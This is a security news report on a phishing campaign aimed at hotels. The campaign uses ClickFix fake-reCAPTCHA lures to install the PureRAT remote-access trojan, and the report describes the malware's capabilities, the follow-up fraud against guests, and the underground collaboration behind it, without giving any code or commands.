Massive ClickFix Phishing Campaign Targets Hotel Industry with PureRAT Malware
A significant phishing campaign has been identified, targeting the hospitality sector by deploying the ClickFix social engineering technique to distribute PureRAT malware. This operation aims to compromise hotel management systems, leading to unauthorized access to booking platforms such as Booking.com and Expedia.
Attack Methodology
The attackers initiate their scheme by sending spear-phishing emails from compromised accounts, impersonating reputable booking services. These emails contain links that redirect recipients to fraudulent websites designed to mimic legitimate platforms. Upon visiting these sites, users encounter a fake reCAPTCHA challenge, a hallmark of the ClickFix tactic. This deceptive method instructs users to execute a PowerShell command, which subsequently downloads and installs the PureRAT malware.
Capabilities of PureRAT
Once installed, PureRAT grants attackers extensive control over the infected system. Its features include:
– Remote Access: Enables unauthorized entry into the system.
– Input Control: Allows manipulation of mouse and keyboard inputs.
– Surveillance: Facilitates capturing of webcam and microphone data.
– Keylogging: Records keystrokes to capture sensitive information.
– File Management: Supports uploading and downloading of files.
– Traffic Proxying: Routes network traffic through the compromised system.
– Data Exfiltration: Extracts data from the infected host.
– Command Execution: Executes remote commands or binaries.
To evade detection and complicate analysis, PureRAT employs .NET Reactor for code obfuscation and establishes persistence by creating a Run registry key.
Broader Implications
Beyond compromising hotel management systems, the attackers extend their reach by contacting hotel customers via WhatsApp or email. They use authentic reservation details to build trust, then prompt customers to verify their banking information through malicious links. These links lead to counterfeit Booking.com or Expedia pages designed to harvest financial data.
Cybercriminal Collaboration
Investigations reveal that the perpetrators acquire information about hotel administrators from underground forums like LolzTeam. They often offer a share of the illicit profits to insiders who assist in the scheme. This collaboration involves specialized distributors, known as traffers, who are responsible for disseminating malware.
Conclusion
The hospitality industry’s reliance on digital platforms makes it a prime target for sophisticated phishing campaigns. The use of the ClickFix technique to deploy PureRAT underscores the evolving nature of cyber threats. It is imperative for organizations to enhance their cybersecurity measures, conduct regular staff training, and remain vigilant against such deceptive tactics to safeguard sensitive information and maintain customer trust.
